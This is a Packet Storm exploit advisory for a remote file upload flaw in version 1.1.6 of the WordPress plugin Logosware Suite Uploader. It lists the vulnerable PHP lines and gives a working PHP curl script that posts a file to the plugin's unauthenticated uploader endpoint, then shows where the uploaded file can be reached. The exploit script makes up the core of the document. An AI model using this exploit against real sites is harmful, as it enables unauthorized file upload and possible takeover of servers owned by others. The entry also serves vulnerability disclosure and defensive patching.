WordPress Logosware Suite Uploader 1.1.6 File Upload

2017-07-30T00:00:00
ID PACKETSTORM:143554
Type packetstorm
Reporter Shahab Shamsi
Modified 2017-07-30T00:00:00

Description

                                        
                                            `[-] Title : WordPress Plugin Logosware Suite Uploader 1.1.6 - Remote File Upload  
[-] Author : Shahab Shamsi  
[-] Vendor : https://wordpress.org/plugins/logosware-suite-uploader/  
[-] Category : Webapps  
[-] Date : 30.July.2017  
  
  
Vulnerable Source:  
176: if(is_uploaded_file($_FILES['zip']['tmp_name']))  
207: move_uploaded_file move_uploaded_file($_FILES['zip']['tmp_name'], $tempZipPath))  
206: $tempZipPath = $temporaryPath . $tempZipName;   
190: $temporaryPath = $this->tempDir . $temporaryDir . "/";   
189: $temporaryDir = date("YmdHis");   
204: $tempZipName = "zipfile" . date("His") . ".zip";   
  
  
  
Exploit:  
<?php  
$shahab="file.jpg";  
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/logosware-suite-uploader/lw-suite-uploader.php");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('zip'=>"@$shahab"));  
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);  
$result = curl_exec($ch);  
curl_close($ch);  
print "$result";  
?>  
  
  
Location File:  
http://localhost/wordpress/wp-content/plugins/logosware-suite-uploader/file.jpg  
`